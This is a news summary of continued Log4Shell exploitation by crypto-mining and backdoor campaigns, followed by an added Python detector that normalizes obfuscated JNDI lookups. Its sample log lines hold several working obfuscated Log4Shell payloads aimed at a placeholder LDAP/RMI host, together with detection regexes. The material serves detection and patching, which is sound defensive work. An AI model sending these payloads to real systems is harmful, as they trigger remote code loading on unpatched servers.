Organizations continue to face attacks exploiting the critical Log4j vulnerability known as Log4Shell, more than two years after the flaw's discovery, SecurityWeek reports.
The vulnerability, tracked as CVE-2021-44228, was reported to Apache in November 2021 and publicly disclosed the following month, setting off a global scramble to patch. Despite those efforts, the flaw remains a persistent threat because Log4j is buried in complex, often transitive software dependencies, which makes comprehensive patching difficult. Nation-state actors and cybercriminal groups, including those linked to China, Iran, North Korea, and Turkey, have incorporated Log4j exploits into their toolkits.

Datadog Security Labs recently uncovered ongoing exploitation of unpatched systems, in which attackers deploy cryptocurrency miners and malicious backdoor scripts. In this new campaign, researchers observed that the attackers obfuscated the JNDI lookup strings (the ${jndi:ldap://...} payloads that trigger the vulnerable lookup) to evade signature-based detection, then deployed XMRig cryptocurrency miners and installed scripts to maintain long-term control over the compromised hosts. This ongoing exploitation underscores how hard it is to eradicate a vulnerability that is still unpatched on some systems years after its discovery.
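To make the evasion concrete, the following added example (not code from the article, from SecurityWeek, or from Datadog's research) shows why a naive signature for the string "${jndi:" misses obfuscated payloads, and how a detector can fold the obfuscation back out before matching. It normalizes the lookups attackers commonly abuse for this (lower, upper, and the ":-" default-value syntax, which is an assumption about which tricks matter, not a full Log4j lookup implementation) and then searches for a surviving JNDI lookup. The log lines are constructed, the 203.0.113.10 addresses are documentation-range placeholders, and the code assumes the referenced environment variable is unset.

```python
import re

# Innermost ${...} lookup: a body with no further '$', '{' or '}' inside it.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup after normalization; group 1 is the URL scheme (ldap, ldaps, rmi, dns, ...).
# Log4j lowercases lookup prefixes, so the match is case-insensitive.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)


def resolve_lookup(body: str):
    """Resolve one innermost lookup body (the text between '${' and '}').

    Handles the lookups attackers lean on for obfuscation (an assumption about
    which tricks matter, not a full Log4j lookup implementation):
      ${lower:X} / ${upper:X}  -> case-folded X
      ${name:-default}         -> default  (so ${::-j} and ${env:NOPE:-j} both give 'j',
                                            assuming NOPE is not set in the environment)
    Returns None for anything else so the lookup is left in place for the detector.
    """
    head, sep, rest = body.partition(":")
    key = head.strip().lower()
    if sep and key == "lower":
        return rest.lower()
    if sep and key == "upper":
        return rest.upper()
    if ":-" in body:
        name, default = body.split(":-", 1)
        # Never collapse the JNDI lookup itself: its URL may legitimately contain ':-'.
        if not name.strip().lower().startswith("jndi"):
            return default
    return None


def normalize(text: str, max_rounds: int = 64) -> str:
    """Repeatedly resolve innermost obfuscation lookups until nothing changes.

    Every substitution removes one '${' and introduces no '$' or '{', so the
    loop terminates on its own; max_rounds is only a safety cap.
    """
    for _ in range(max_rounds):
        changed = False

        def _sub(match):
            nonlocal changed
            out = resolve_lookup(match.group(1))
            if out is None:
                return match.group(0)
            changed = True
            return out

        text = INNER_LOOKUP.sub(_sub, text)
        if not changed:
            break
    return text


def detect(line: str):
    """Return (normalized_line, scheme); scheme is None when no JNDI lookup survives."""
    norm = normalize(line)
    match = JNDI_LOOKUP.search(norm)
    return norm, (match.group(1).lower() if match else None)


def scan(lines: dict) -> dict:
    """Map each line label to the JNDI URL scheme it carries, for flagged lines only."""
    hits = {}
    for label, line in lines.items():
        _, scheme = detect(line)
        if scheme:
            hits[label] = scheme
    return hits


# Constructed sample request lines (user-agent field in quotes); not taken from the report.
SAMPLE_LINES = {
    "benign": 'GET / HTTP/1.1 "Mozilla/5.0 (X11; Linux x86_64)"',
    "benign_lookup": 'GET / HTTP/1.1 "${env:HOME:-/root} ${date:yyyy}"',
    "plain": 'GET / HTTP/1.1 "${jndi:ldap://203.0.113.10:1389/a}"',
    "lower": 'GET / HTTP/1.1 "${${lower:j}ndi:${lower:l}dap://203.0.113.10:1389/a}"',
    "default": 'GET / HTTP/1.1 "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://203.0.113.10:1389/a}"',
    "env_default": 'GET / HTTP/1.1 "${${env:NOPE:-j}ndi:rmi://203.0.113.10:1099/a}"',
    "nested": 'GET / HTTP/1.1 "${${lower:${upper:j}}NDI:LDAP://203.0.113.10:1389/a}"',
}


if __name__ == "__main__":
    for label, line in SAMPLE_LINES.items():
        norm, scheme = detect(line)
        verdict = f"JNDI via {scheme}" if scheme else "clean"
        print(f"{label:13s} {verdict:14s} {norm}")
```

Only the "plain" line contains the literal "${jndi:" that a simple signature looks for; the other four malicious lines reach the same lookup only after normalization. Two caveats apply. The normalizer covers a handful of lookups, so a variant built from a lookup it does not model would still slip through, and detection of this kind is a compensating control, not a fix: the durable remedy for the dependency problem the article describes is to find every embedded copy of Log4j (including copies shaded into other jars) and upgrade to a fixed 2.17.x release or later, or at minimum remove the JndiLookup class from the jar.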